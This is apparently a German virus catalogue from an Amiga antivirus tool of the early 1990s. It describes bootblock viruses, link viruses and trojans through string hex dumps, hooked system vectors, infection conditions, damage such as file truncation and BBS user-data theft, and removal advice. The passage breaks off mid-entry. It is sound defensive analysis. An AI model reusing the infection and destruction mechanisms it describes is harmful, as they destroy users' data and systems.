4e4f4943 DOOR_BELLS= NOIC 4f4e5320 44495243 41434845 20515549 ONS DIRCACHE QUI 434b2046 46532000 004405b5 72616d3a CK FFS ..D..ram: 6464203e 4e494c3a 20445249 56452064 dd >NIL: DRIVE d 68303a20 4e414d45 203d444f 4f525f42 h0: NAME =DOOR_B 454c4c53 3d204e4f 49434f4e 53204449 ELLS= NOICONS DI 52434143 48452051 5549434b 20464653 RCACHE QUICK FFS .usw ..... - DOpus-Trojan siehe oben bei CoP-Trojan Typ C - DOpus-Virus Filename:dopusrt Laenge ungepackt: 6408 Bytes Bleibt NICHT im Speicher. Von der Definition kein Virus, da keine Vermehrung. Einbruchswerkzeug gegen Mailboxen. Veraendert zwei Files und fuehrt dann das OrigPrg aus. Empfehlung: loeschen VT erkennt File: 15.01.93 Im File ist zu lesen: 61727900 00626273 3A757365 722E6461 ary..bbs:user.da 74610000 00000000 00000000 00000000 ta.............. ;...... 00000000 00000000 6262733A 75736572 ........bbs:user 2E6B6579 73000000 00000000 00000000 .keys........... ;...... 00000000 00000000 00000000 416E6479 ............Andy 2F446563 61646500 00000000 00000000 /Decade......... 00000000 00000000 00000031 39393200 ...........1992. 00000000 3E2D442D 452D432D 412D442D ....>-D-E-C-A-D- 452D3C00 00000000 00000000 00000000 E-<............. 00003034 302F3735 35333637 32000000 ..040/7553672... Nachtrag 04.03.93: Es ist ein 2. File aufgetaucht, an das dieses gleiche Teil angelinkt ist. Auch dieses File ge- hoert zu DOpus. CRC Laenge ungepackt: 20716 Bytes Nachtrag 06.03.93: Da jetzt 2 Testfiles vorhanden sind, wurde eine Ausbauroutine eingebaut. Da diese Routine nur an zwei Files getestet werden kann, koennte sie wackeln. Fertigen Sie bitte deshalb vor dem Ausbauversuch UNBEDINGT eine Kopie des verseuchten Files an. Danke - DOSSPEED (Neuseeland) richtiger Name: Revenge of the Lamer - Dotty-Virus immer $7F000 KickTag, KickCheckSum Im Programm: DoIo, Vec5 Fordert trackdisk.device NICHT Vermehrung: BB Weitere Schaeden: Modifiziert PRIVAT-intuition-struktur. - Dotty-MAFIA-Virus: Text geaendert und falscher Sprung. 4d202041 20204620 20492041 2020202e M A F I A . - Dotty-MAFIA-Inst. gepackt: 1360 Bytes entpackt: 1928 Bytes Ein 3c(a7)-Link File (s.o.), das einen Dotty-MAFIA.BB im Speicher verankern soll. Das Teil war an ALFaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Da bei der Verankerung im Speicher, absolute Speicheradressen, die bei vielen Rechnern nicht belegt sind, verwendet werden, erscheint haeufig der GURU. - DriveInfo V0.91 by ESP trojanisches Pferd, Laenge: 1704 Bytes (PP-Data und ein decrunch-header davor) entpackt: Laenge: 1740 Bytes Im File ist dann z.B. zu lesen: EAST SIDE POWER 91/92 KS2.04: NEIN Findet dann KEIN Laufwerk und meldet sich mit Requester. Nach kurzer Zeit dann GURU beim Arbeiten. Versucht unter KS1.3 zu taeuschen, indem Laufwerksdaten (Drive, Volume usw.) ausgegeben werden. Verhindert hierbei AutoRequest. Installiert mit addintserver "Install yeah!" . Wird nach Crime!++ - Installierung mit Rem- IntServer wieder entfernt. Interrupt = 5 . Installiert nach etwa EINER Minute (das ist echt neu) Crime!++ im Speicher (Cool, wait usw. s.o.). Empfehlung: sofort loeschen siehe auch : Crime!++ - DSC101-Virus Zerstoerungsfile gegen BBS: Ungepackt Laenge: 33152 Bytes . VT kennt nur die ungepackte Version, weil mir das Prg. ungepackt zugeschickt wurde. Von der Definition KEIN Virus, da keine Vermehrungsroutine vorhanden. Grosse Teile des Prg.s bestehen nur aus Null-Bytes. Ein Teil des wirklichen Prg.s ist codiert mit: not.b (a0)+ Das Prg. bleibt NICHT im Speicher Das Prg versucht durch eine Cli-Ausgabe zu taeuschen: Disk Speed Check V1.01ß - © Micro-Tech Softwares® 1992 Programming by Alan Forslake. (1.10.1992) Usage : DSC -mode <drive>, Where mode is : 1=disk speed check 2=scsi speed test Didnt` found a supported SCSI drive, sorry! Try to contact Alan Forslake on :223/22/32 in@sf@com In Wirklichkeit wird versucht (aber wirklich nur versucht) folgende Teile zu loeschen: bbs:user.keys bbs:user.data sys:s/startup-sequence s:acp.startup Empfehlung: einfach loeschen VT Fileerkennung getestet: 19.10.92 - DTL-Virus BB Micro-System-Clone s.u. 51c8ffee 4ef90007 f7944454 4c214454 Q...N.....DTL!DT 4c201d5a 19594f55 52204449 534b2049 L .Z.YOUR DISK I 5320494e 46454354 45442042 59201d65 S INFECTED BY .e - DUMDUM BB auch mit KS2.04 immer ab $7FA00 Cool, im Prg DoIo, $64, $80 (Hallo Enforcer-Freunde) Text im BB lesbar: You are the owner of a DUMDUM virus please unprotect disk disk to kill! (machen Sie das BITTE NICHT) Textausgabe mit DisplayAlert Schaeden und Vermehrung: - Vermehrung ueber BB oder: - Format Disk - DUMDUM-Clone: DisplayAlert-Text geaendert. - DUMDUM-TAI5-Clone Text geaendert: 00000013 2e2e2e2e 2e2c3b2d 3a3a542e .........,;-::T. 412e492e 203b2e2e 292e2e2e 2e2e2e2e A.I. ;..)....... - DUMDUM-Clone-Inst. gepackt: 1332 Bytes entpackt: 1916 Bytes Ein 3c(a7)-Link File (s.o.), das einen DUMDUM-Clone.BB im Speicher verankern soll. Das Teil war an 6Vekaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Die Dummheit zeigt sich daran, dass ein BB im Speicher verankert wird und anschliessend mit dem Orig-6Vekaus-Aufruf die sechs wichtigsten Vektoren wieder geloescht werden. - DUM2DUM-Virus BB Block 0-5 = 6 Bloecke Cool, DoIo KS1.3 : Ja KS2.04: Ja (Vermehrung) Versucht durch Anzeige eines sauberen BBs zu taeuschen. Namensbegruendung: Im Speicher ist zu lesen: 646f732e 6c696272 61727900 61000000 dos.library.a... 00000000 00004455 4d3c4949 3e44554d ......DUM<II>DUM Schaden 1: Mit dem verbogenen DoIo findet die Vermehrung statt. Files, die ab Block 2 liegen, werden ueberschrieben und sind NICHT zu retten. VT wird dann bei Block-Kette Bad-T.Data ausgeben, sobald ein File Block 2-5 belegt hatte. Schaden 2: Ab $6E000 werden 2 Zeiger geaendert. Dies fuehrt haeufig zu Bitmap ungueltig. $6E000 ist nur bei DD-Disk der Rootblock. Vorher: Nachher: 130: 000000f2 0000018d ........ 130: 000000f2 0000018d ........ 138: ffffffff 00000332 .......2 138: 00000000 00000332 .......2 ^^^^^^^^ ^^^^^^^^ 140: 00000000 00000000 ........ 140: 00000000 00000000 ........ ;....... 198: 00000000 00000000 ........ 198: 00000000 00000000 ........ 1a0: 00000000 000053b9 ......S. 1a0: ffffffff 000053b9 ......S. ^^^^^^^^ ^^^^^^^^ Es wird also bei naechster Gelegenheit der Disk-Validator aktiv, der aber nichts mit dem Virusteil zu tun hat. Schaden 3: Sobald eine Zaehlzelle den Wert $50 erreicht hat, wird in der dos.lib ein Wert mit cmpi.w #$4EF9,(a0) getestet. Stimmt das Ergebnis nicht, so wird dosopen, dosread und doswrite verbogen. Sobald dieser Virusteil aktiviert ist, treten haeufig GURUS auf. Aber es reicht leider immer fuer die Zerstoerung einiger Files. Diese Files koennen leider NICHT gerettet werden und werden von VT auch nicht erkannt. Der geschriebene Muell ist auch von $DFF007 abhaengig. Beispiele: Vorher: Nachher: 000: 000003f3 00000000 ........ 000: 000003f3 00000000 ........ 008: 00000002 00000000 ........ 008: 00000002 00000000 ........ 010: 00000001 0000009e ........ 010: 2e2e2e2e 2e2e2e2e ........ 018: 00003246 000003e9 ..2F.... 018: 2e2e2e2e 2e2e2e2e ........ 020: 0000009e 487a01c8 ....Hz.. 020: 2e2e2e2e 2e2e2e2e ........ 028: 48e7fffe 49fafff2 H...I... 028: 2e2e2e2e 2e2e2e2e ........ 030: 2054d1c8 d1c85848 T....XH 030: 2054d1c8 d1c85848 T....XH 038: 2648504b 2c780004 &HPK,x.. 038: 2648504b 2c780004 &HPK,x.. Vorher: Nachher: 000: 000003f3 00000000 ........ 000: 00000000 00000000 ........ 008: 00000009 00000000 ........ 008: 00000000 00000000 ........ 010: 00000008 0000001e ........ 010: 00000000 00000000 ........ 018: 00002274 00000c73 .."t...s 018: 00000000 00000000 ........ 020: 00000520 00001542 ... ...B 020: 00000000 00000000 ........ 028: 00000500 00000080 ........ 028: 00000000 00000000 ........ 030: 000021a9 0000123d ..!....= 030: 00000000 00000000 ........ 038: 000003e9 0000001e ........ 038: 00000000 00000000 ........ - DYNAMIX-Virus BB Loeschen Es duerfte sich um einen Pentagon.BB mit geaendertem Text handeln. Immer ab $7FB00 Cool $7Fb4c und DoIo im Prg. Testet auf einige VirenLangworte Schreibt sich auf DOS0-Disketten Fordert trackdisk.device NICHT !!! Im BB ist zu lesen: 14546865 2044594e 414d4958 20564952 .The DYNAMIX VIR 5553204b 494c4c45 52205634 2e30205b US KILLER V4.0 [ - East-Star-Virus BB NorthStar-Clone Immer ab $7EC00, Cool im Prg. DoIo Fordert trackdisk.device NICHT Namensbegruendung: 00784561 73742d20 53746172 00020002 .xEast- Star.... Weitere im BB lesbare Texte: 00500c4e 6f205669 72757320 6973206f .P.No Virus is o 6e207468 65204469 736b2052 45442042 n the Disk RED B 55524e49 4e472042 49475354 41520000 URNING BIGSTAR.. usw. - East-Star-Install File Laenge ungepackt: 8340 Bytes An das Prg. MComm wurde mit Hunklab ein East-Star-BB mit Install-Routine angelinkt. In diesem angelinkten Teil ist "trackdisk.device" zu lesen. VT bietet Ausbau an. - EASY-E-BBS-Trojan File verseucht Laenge: 38860 Bytes Teil ausgebaut Laenge: 38416 Bytes Verlaengerung also 444 Bytes Keine verbogenen Vektoren Im File ist zu lesen: 00000000 00000000 00000000 00004541 ..............EA 53592d45 00006468 303a6262 732f7573 SY-E..dh0:bbs/us 65722e64 61746100 00000000 000003f2 er.data......... Schaden: Einbruchswerkzeug fuer BBS Nach dem Ausbau mit VT sollte ein Paradox Starfield-Intro uebrigbleiben. Lauffaehigkeit A2000 68030 ja A4000/40 nein Nachtrag 10.05.94: Ein anderes AntiVirusProgramm erkennt auch noch NACH dem erfolgreichen Ausbau mit VT den EASY-Trojan. Ich nehme an, dass diese Fehlerkennung im naechsten update (Juni 94) be- hoben sein wird. - ELECTROVI.Virus BB FORPIB-Clone siehe unten Nur Text geaendert: 454c4543 54524f2d 56495349 4f4e2020 ELECTRO-VISION 2020414e 54492d56 49525553 20202020 ANTI-VIRUS 46312d31 31202020 20524f52 52592020 F1-11 RORRY - ELENI!-Installer siehe bei MessAngel-Inst. - ELENI!-B-Virus siehe bei MessAngel-B-Virus - ELENI!.BB siehe bei MessAngel.BB - ELENI-Clock-Virus BB Im BB ist zu lesen: 202a454c 454e492a 20000000 00000000 *ELENI* ....... KS 1.3: nein KS 2.0: ja Fordert trackdisk.device NICHT Im Speicher immer ab $7F144 Verbogene Vektoren: Cool $7F296, DoIo $7F2DA, SumKickData $7F32A Vermehrung: Als BB Dabei wird zuerst der Orig-BB eingelesen und nach einem LW ( $4EAEFE38 = jsr -$1c8(a6) ) im BB gesucht. In den Original Commodore-BBen kommt es nicht vor. Falls dieses LW gefunden wird, so wird zuerst der Original-BB auf die Disk nach $D9400 = Bl 1738/39 gerettet. VT sucht beim Test (Gadget O-BB) nach dem ausgelagerten BB. Ein File das an dieser Stelle liegt, ist natuerlich ueberschrieben und NICHT mehr zu retten. Nach einem Reset und dem Start von dieser Disk versucht das BB-Virusteil den Orig-BB nach $7A000 zu laden und falls ge- funden nach dem Verbiegen der Vektoren mit JMP $7A00C auszu- fuehren. cmpi.b #$37,$BFEC01 Test auf li.Alt-Taste = Fluchttaste Schaeden: Es werden mehrere Hardware-Register veraendert. (z.B. das Datum aendert sich) Hinweis: beim A2000A liegt die Uhr aber bei $D80000 . Beispiele: Falls $DC002D groesser als 4 ist und in $60000 1 steht, wird im Cli mehrmals *ELENI* ausgegeben. Falls $DC002D #1 oder $BFE901 #9 sind, springt das Prg. zu einer Endlosschleife mit Kopfstep und LED-Blinken. Es hilft nur ein Reset. Bitte booten Sie von einer sauberen Disk und vergessen Sie nicht, die Uhr neu zu stellen, falls eine Hardware-Uhr vor- handen ist. Hinweis 1: Das VirusTeil belegt Speicher ohne AllocMem. Andere Prge. z.B. VT koennen bei wenig Speicher das Virusteil ueberschrei- ben. Hinweis 2: Es wird IMMER ein DOS0-Virus-BB geschrieben. Auf einer Disk mit FFS-Struktur kann nach dem naechsten Schreibzugriff, die Disk-Struktur beschaedigt sein. Anzeichen dafuer: VT meldet beim Filetest IMMER bad Data . Versuchen Sie dann bitte einen DOS1-BB (FastFileSystem) oder gar DOS5-BB aufzuspielen. Manchmal koennen Sie noch etwas retten. - ELENI-Wirus BB (ja W statt V) siehe unten bei Mount-Virus Bitte verwechseln Sie diesen BB nicht mit dem ELENI-Clock-Virus - Elien-Trojan File Laenge gepackt: 1016 Bytes Laenge ungepackt: 596 Bytes Keine verbogenen Vektoren Keine Vermehrung Im File ist zu lesen: 79000000 00000000 00000000 7379733a y...........sys: 4d654761 53555858 2e545854 00006161 MeGaSUXX.TXT..aa 61616161 61610024 5645523a 456c6965 aaaaaa.$VER:Elie 6e5f7669 7275735f 63686563 6b657220 n_virus_checker Wird also wahrscheinlich als Virus-Checker fuer die startup- seq. angeboten. Schaden: Legt nach dem Start ein File mit dem Namen MeGaSUXX.TXT an und schreibt in einem loop 9 Bytes aaaa aaaa 0 in dieses File. Der Loop (move.l #$186a0,d0) hat #100000 Durchlaeufe. Also wird das File 900000 Bytes lang. Im MeGaSUXX.TXT-File koennen Sie lesen: 61616161 61616161 00616161 61616161 aaaaaaaa.aaaaaaa 61006161 61616161 61610061 61616161 a.aaaaaaaa.aaaaa usw. Falls das Speichermedium inzwischen voll wird, erscheint bei mir ein Disk-Full-Requester. Dann muss Ihnen aber wirklich auf- fallen, dass etwas nicht stimmt. Es handelt sich um eine Anfaengerprogrammierung und einige Teile werden nie erreicht. VT bietet nur loeschen an. - EM-Wurm (zielgerichtet gegen EUROMAIL) nicht resetfest immer: schreibt in startup-sequence $A0,$0A (1.Zeile) eigener Process: clipboard.device schreibt in c: $A0, Laenge: 3888 Bytes (ASCII-Text vorhanden) schreibt in 5.Byte von c:protect (falls vorhanden) $01 Folge: protect wird unbrauchbar Zerstoerungsroutine: Wird nur ausgefuehrt wenn Verzeichnis EM, EUROMAIL oder EUROSYS vorhanden ist. Ueberschreibt alle Files in obengenannten Schubladen mit Speicherinhalt ab MsgPort. In zerstoerten Files ist ab $BC clipboard.device zu lesen. Dann wird mit dosdelay $259A eine 3 Minuten Pause eingelegt. Nach dieser Pause wird die Zerstoerungsroutine wieder in der Schleife aufgerufen. Ursprungsprogramm: QuickInt PP-crunched Laenge: 3196 Bytes Mein VT loescht den Process n i c h t, sondern fuellt ihn mit NOP's. Einige Programmteile, z.B. Autorequester, con usw. konnten nicht getestet werden, weil ich EUROMAIL nicht besitze. Diese Teile werden ebenfalls mit NOP's ueberschrieben. Falls des- halb bei aktivem EUROMAIL-Programm ein GURU erscheint, bitte ich um Hilfestellung. Danke !! - EOL-Trojan ?? File Hoechstens ein Trojan, deshalb die Fragezeichen. Laenge gepackt: 8168 Bytes Laenge entpackt: 12560 Bytes Keine verbogenen Vektoren Kein Virus VT bietet loeschen an. Entscheiden Sie bitte selbst. Im entpackten File ist zu lesen: 73616765 3a201a45 4f4c203c 736f7572 sage: .EOL <sour 63653e20 3c646573 74696e61 74696f6e ce> <destination 3e202d61 75746f64 65746563 74732077 > -autodetects w 68657468 65722069 6e736572 74206f72 hether insert or 2064656c 65746520 43522028 24304429 delete CR ($0D) 2957656c 636f6d65 20746f20 454f4c20 )Welcome to EOL ;..... 02224e5e 4e750943 6f6e4465 76696365 ."N^Nu.ConDevice Laut doc soll das Programm CR entfernen oder einsetzen. Nach Fremdaussagen geht das auch. ABER !!!!!! Mit SnoopDos ist nachweisbar, dass auch ein File ConDevice geloescht wird, falls vorhanden. ConDevice kenne ich NICHT. Es koennte also ein Schaden entstehen, falls dieses Teil fuer ein Programm wichtig ist. Bitte entscheiden Sie deshalb selbst. Oder es sagt mir jemand, fuer was ConDevice gut ist. Ich waere dankbar dafuer. - Ethik-Virus siehe bei SHIT ( ETIC ) Unter diesem Namen wurde mir ein BB zugeschickt. Aber auch im Speicher war dieser Name nicht nachvollziehbar. - EXCREMENT-Virus BB Cool: $7F47A DoIo: $7F4C2 immer ab: $7F400 KS2.06: GURU B nach Reset Fordert trackdisk.device NICHT Namensbegruendung: im BB ist zu lesen: 61727900 45584352 454d454e 54002d7c ary.EXCREMENT.-. Vermehrung: BB linke Maustaste= Abbruch und Cool-Vektor loeschen Test auf DOS-Kennung Test ob schon verseucht mit cmpi.l #"EXCR",$54(a4) Schaeden: Sobald eine Zaehlzelle den Wert $A erreicht hat, blinkt die LED. Mehr ist bei mir nicht passiert. Clones: Sentinel = USSR 492 - EXCREMENT-Installer File Laenge: 1180 Bytes VT erkennt EXCREMENT-Virus. Ein File das aus dem BB (s.o.) und ein paar Speicher-Install- Bytes besteht. Das Teil kann sich dann nur als BB und NICHT als File vermehren. Einfach loeschen. - Excreminator 1 File Laenge: 2392 Bytes auch KS2.04 KEINE verbogenen Vektoren KEINE Vermehrungsroutine KEINE Schreibroutine fuer Startup-Seq Versucht durch angeblichen Virustest zu taeuschen. Im File zu lesen: The Lame Trio usw. verraet sich durch System-Requester: Write-pro.... Schaeden: Versucht in libs Exec.library (4 Bytes) als Zaehlerfile (Startwert=5) anzulegen. Verringert dann bei jedem Aufruf den Zaehler. Bei 0 KopfStep ALLE Laufwerke Folge: Not a DOS Disk und mit DisplayAlert: LAME SUCKER usw... danach RESET Empfehlung: beide Files sofort loeschen und gegebenenfalls Startup-Seq. ueberpruefen. - EXECUTORS BB Cool $7EC74 DoIo $7ED4A im Speicher immer $7EC00 Herpes-Clone KS2.04: ja Vergleiche auch: Kimble.BB-Virus, CreepingEEL.BB-Virus Fordert trackdisk.device NICHT Namensbegruendung: s.u. Vermehrung: ueber BB Schaden: Zerstoert Track ab $6E000 (Bei DD-Disk = Root) Sobald eine Zaehlzelle den Wert 5 erreicht hat, wird ein Text ausgegeben: Hintergrund: Deutschland-Fahne HI ! THE EXECUTORS ARE HERE Some of your fucking Disks are infected with the Virus V1 Greets are going to : M A X O F S T A R L I G H T Lamer....FUCK OFF! - EXORCIST Virus BB AlienNewBeat Clone siehe oben Es wurde der Text geaendert. Eine Meisterleistung Im BB ist zu lesen: 64206279 20746865 20534154 414e2076 d by the SATAN v 69727573 21202020 4469616c 20323233 irus! Dial 223 30343934 302c2061 6e642061 736b2066 04940, and ask f 6f722074 68652045 584f5243 49535421 or the EXORCIST! Anderer Name: SATAN-Virus - Express2.20-Virus keine Vermehrung (also von Def. kein Virus) keine verbogenen Vektoren, Zerstoerungsprogramme 1. File Express2.20 Laenge: 194064 2. File aibon Laenge: 776 aibon haengt am Ende von Express2.20 und wird mit jmp ange- sprungen. Am Ende der Files ist zu lesen bbs: sys: ram: dos.library . Naja werden Sie denken wieder mal gegen Ami-Express gerichtet. Trifft mich nicht, hab ja keine Mail-Box. Halt !!!! Vorsicht ! Das Starten von Express2.20 reicht um Sie an die Decke gehen zu lassen. Zerstoerungsablauf: - Sie starten Express2.20 von Sys-Ebene (halt mal sehen was das Programm macht) - aibon wird nach :s kopiert - :s/startup-sequence wird auf EINE Zeile :s/aibon gekuerzt - Requester Datentraeger bbs einlegen - Sie haben keine Mailbox und klicken cancel - Tastatur wird gesperrt - und jetzt gehts los - jedes File in sys: wird eingelesen und mit 42 Bytes Laenge zurueckgeschrieben. Da kommt Freude auf. - Also Tastatur-Reset (geht leider nicht siehe oben) - Also nehmen Sie not validated in Kauf und schalten schnell den Computer 1 Minute aus. - Computer wieder an UND es wird weiter geloescht (richtig: sys:s/startup-sequence mit der Zeile :s/aibon existiert noch) Das merken Sie aber erst so nach 40 Sekunden, weil ihre startup-sequence fuer die Festplatte immer eine Zeit braucht. - Um hier noch etwas zu retten brauchen Sie eine WB-Disk von der Sie booten koennen und im Zweifelsfalle ihre Festplatte anmelden zu koennen. Kopieren Sie auf ihre Festplatte eine neue startup-sequence und hoffen Sie, dass Sie schnell genug waren und einige Files noch nicht zerstoert wurden. Nachtrag: Falls bbs: gefunden wurde, werden natuerlich zuerst dort alle Files zerstoert. Herkunft: d-aex220.lha Laenge 135400 angeblich neues Ami-Express Erkennung der beiden Files mit VT getestet: 09.09.92 Loeschen der beiden Files mit VT getestet : 09.09.92 aibon: 00000000 00000000 00006262 733a0073 ..........bbs:.s 79733a00 72616d3a 00646f73 2e6c6962 ys:.ram:.dos.lib Ein weiteres bekanntes File: acp.ctrl Laenge: 56016 Bytes Enthaelt am Ende ebenfalls aibon Nachtrag 01.05.93: Es ist ein aibon 2 aufgetaucht. Verhalten siehe oben. Install-File Laenge ungepackt: 1872 Bytes aibon 2 Laenge: 784 Bytes Besonderheit: Install-File sucht zuerst nach Portnamen: ser.read aibon 2 neu: df0, df1 : 00007379 733a0062 62733a00 6466303a ..sys:.bbs:.df0: 00646631 3a00646f 732e6c69 62726172 .df1:.dos.librar Nachtrag 02.05.93: Es ist ein File DwEditV1.62 verseucht mit aibon2 aufgetaucht. FileLaenge verseucht: 43700 Bytes aibon2 ausgebaut : 41468 Bytes aibon2 wurde mit hunklab angelinkt. Waehlen Sie bitte Ausbau. Die Lauffaehigkeit des sauberen Files wurde getestet. Schaeden siehe oben - Aibon2-Mount2-Clone: Es ist ein Toolsdaemon V2.2 aufgetaucht, verseucht mit diesem Cloneteil. FileLaenge verseucht: 7128 Bytes Trojan ausgebaut : 4896 Bytes Dieses Teil wurde mit der Hunklab-Methode angelinkt. VT bietet Ausbau an. Unterschiede zu Aibon: - mount wird nach s kopiert (Laenge 784 Bytes) - s:startup-sequence wird auf EINE Zeile s:mount,$0a,$0a gekuerzt. - Files werden auf 42 Bytes gekuerzt und mit Speicherinhalt ab $0 (ja Zero-Page) gefuellt. Beispiel-File mit KS1.3: 0000: 00000000 00000676 00fc0818 00fc081a .......v........ 0010: 00fc081c 00fc081e 00fc0820 00fc0822 ........... ..." 0020: 00fc090e 00fc0826 00fc .......&.. Oder es entstehen Files mit Inhalt Null (Beispiel war setpatch): SetPatch 0000: 00000000 00000000 00000000 00000000 ................ 0010: 00000000 00000000 00000000 00000000 ................ 0020: 00000000 00000000 0000 .......... - Im Trojan-File ist zu lesen: 00000000 00000000 00000000 7379733a ............sys: 00686430 3a006466 303a0064 66323a00 .hd0:.df0:.df2:. 646f732e 6c696272 61727900 00000000 dos.library..... ;..... 03eb0000 00000000 03f2733a 6d6f756e ..........s:moun 740a0a73 3a737461 72747570 2d736571 t..s:startup-seq 75656e63 6500733a 6d6f756e 74000000 uence.s:mount... ;..... 00000000 00006864 303a0073 79733a00 ......hd0:.sys:. 72616d3a 00646f73 2e6c6962 72617279 ram:.dos.library 00736572 2e726561 6400646f 732e6c69 .ser.read.dos.li 62726172 79000000 00000000 0000646f brary.........do 732e6c69 62726172 79004261 636b4772 s.library.BackGr 6f756e64 5f50726f 63657373 00000000 ound_Process.... Also auch kleinere Aenderungen bei den Laufwerken. VT sucht nach dem Process und versucht eine Abschaltung. Mit einem GURU muss gerechnet werden. Der Install-Process besitzt ein Dos-Delay ($29bf8 = fast eine Stunde) . Rest siehe oben bei Express-Beschreibung. - EXTREME BB DoIo, KickTag, KickCheckSum, Rasterstrahl entweder 7f800 oder ff800, da Berechnung ueber SysStkLower+$1000 lesbarer Text im BB: THE EXTREME ANTIVIRUS usw. sobald Zaehlzelle Null : Zerstoeren (Disk BAD) aller nicht schreibgeschuetzten Disks in allen LW und Alertmeldung Vermehrung: ueber BB Clone: FAT2-Virus, ZACCESS 3, PRIMAVERA, - F.A.S.T. Cool, DoIo , FreeMem, immer ab $7F000 Alertmeldung (verschluesselt mit eori-Byte in Abhaengigkeit von $DFF006) und loeschen veraendert auch $C0-$E0 (SetPatchListe!) Vermehrung: BB - F.A.S.T. 1 FAST-Clone im BB wurde der codierte Prg.Teil um einige Bytes verschoben, um im BB-Kopf dos.library einbauen zu koennen. Die Speicher- lage wurde nicht veraendert. - F.I.C.A Beginio, KickTag, KickCheckSum, SumKickData Vermehrung: BB Besonderheit: spielt sauberen BB vor sichtbarer Text im BB ab $288 z.B. F.I.C.A RULES! - F.I.C.A-VIRI-Clone Nur Text geaendert: 57686174 20646f65 73207468 69732073 What does this s 61793f20 56697269 20617265 20746865 ay? Viri are the 206b696e 6773206f 66206c61 6d657273 kings of lamers - Fast Eddie Virus BB starke Aehnlichkeit mit Glasnost Block 2 u 3 KickTag, KickCheckSum KS2.04 nein im Prg noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Im BB ist an $1c FE91 zu lesen Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner (Farbspiel) schreibt eigenen BB bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 Fast Eddie . Dieser Block kann NICHT gerettet werden. Benennt Disknamen um ( This disk is infected (HE-HE) ) . Codiert jeden BB neu mit ByteWert von $DFF006 eor.b d1,(a0)+ . Decodiert eigenen BB mit eor.b d6,(a0)+ . Decodiert im Speicher : Call 43-444304 and ask for HENRIK HANSEN (FAST EDDIE) siehe auch Clone INFECTOR - Fastcall-Trojan anderer Name DMS206-Trojan s.o. - FAT 1 Virus BB TimeBomb V1.0 BB-Virus-Clone siehe unten anderer Name: The FAT Stinkbomb 1 Nur Text geaendert. Eine Meisterleistung Im BB und Speicher ist zu lesen: 14535449 4e4b424f 4d422120 4665642e .STINKBOMB! Fed. 20416761 696e7374 20546f78 69642057 Against Toxid W 61737465 20677265 65747320 46656974 aste greets Feit 652d546f 6d210001 00000000 42b90007 e-Tom!......B... Dieser Text wird auch fuer DisplayAlert verwendet. - FAT 2 Virus BB EXTREME-Clone siehe oben anderer Name: The FAT Stinkbomb 2 Nur Text geaendert. Eine Meisterleistung Im BB und Speicher ist zu lesen: 696f6e2e 6c696272 61727900 00b01546 ion.library....F 20412054 202d2046 65642e20 41676169 A T - Fed. Agai 6e737420 546f7869 64205761 73746521 nst Toxid Waste! - FCheck Virus File BYTEPARASITE III - Clone s.o. - FEARS2-Demo (L) NON-DOS-Disk Cold, Cool KEIN Virus Empfehlung: Loeschen Soll nach Reset Teile des Fears2-Speichers ueberschreiben. - FileGhost-Inst. File anderer Name: HardSpeeder Laenge ungepackt: 8160 Bytes Typ A Laenge ungepackt: 8116 Bytes Typ B Sowohl Typ A als auch B schreiben 876 Bytes Linklaenge. Versucht durch Text zu taeuschen: 6d486172 64537065 65646572 20a92062 mHardSpeeder . b 79204368 72697374 69616e20 4e65756d y Christian Neum 616e6e2e 0a506174 63682069 6e737461 ann..Patch insta Auch in dem beiliegenden Doc.File Macht angeblich HD schneller und ist deshalb besonders fuer Sysops geeignet. Verbogene Vektoren: Forbid, LoadSeg, NewLoadseg In Wirklichkeit wird der FileGhost-Virus s.u. im Speicher verankert. VT bietet loeschen an. - FileGhost-Virus Link KS2.04 : ja KS3.0 : ja Verlaengert ein File um 876 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Forbid, Loadseg, NewloadSeg Das VirusTeil ist teilweise codiert mit: eor.b d0,(a0)+ Der Wert von d0 wird vom VirusPrg. staendig geaendert (Forbid) und ist deshalb bei jedem Link neu. Namensbegruendung: im Speicher ist zu lesen: 732e6c69 62726172 79004869 20467269 s.library.Hi Fri 656e6421 20446f6e 60742077 6f727279 end! Don`t worry 2e2e2e20 49746073 206f6e6c 79207468 ... It`s only th 65204669 6c654768 6f73742e 00000bf8 e FileGhost..... Das Virusteil meldet sich nie. Vermehrungsroutine: - max. Filelaenge #100000 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden (max. loop $3e (+1) ) - RTS wird ersetzt durch bra.s oder NOP - FileGhost-2-Virus Link KS2.04 : ja KS3.0 : ja Verlaengert ein File um 796 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Loadseg Falls es einen Installer gab, so wird der noch gesucht. Das VirusTeil ist teilweise codiert mit: add.b x,(a0)+ Der Wert von x wird vom VirusPrg. staendig geaendert ($DFF006) und ist deshalb bei jedem Link neu. Namensbegruendung: im Speicher ist zu lesen: e638646f 732e6c69 62726172 79002046 .8dos.library. F 696c6547 686f7374 2032202d 204d6572 ileGhost 2 - Mer 72792058 2d4d6173 20616e64 20612068 ry X-Mas and a h 61707079 206e6577 20796561 722e2e2e appy new year... Das Virusteil meldet sich nie. Vermehrungsroutine: - max. Filelaenge #100000 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden (max. loop $3e (+1) ) - RTS wird ersetzt durch bra.s oder NOP Ueberlaueft 3E8,3F0,3F1-Hunks usw. !!!!! VT2.68 sollte das Teil im Speicher finden. VT2.68 sollte das Teil ausbauen koennen. Hinweis 1 Okt.94: Es ist ein verseuchtes muchmore (18012) aufgetaucht: 0020: 000003e9 000000c9 4ef90000 00000000 ^^^^ 1.Hunk ^^^^ JMP 0030: 48e7fffe ^^^^ Virusbeginn Der Sprungbefehl bra.s (600x) in den Virusteil kommt aber im Orig-Hunk gar nicht vor. So kann sich das Teil gar nicht linken d.h. es draengt sich die Vermutung auf, dass das Virusteil von Hand FALSCH eingefuegt wurde. Ich habe laenger mit dem ver- seuchten und dem ausgebauten Teil "geuebt". Das verseuchte Teil KANN das Virusteil NICHT im Speicher aktivieren, da mit einem JMP darueber hinweggesprungen wird. Das unverseuchte File konnte NIE verseucht werden. VT 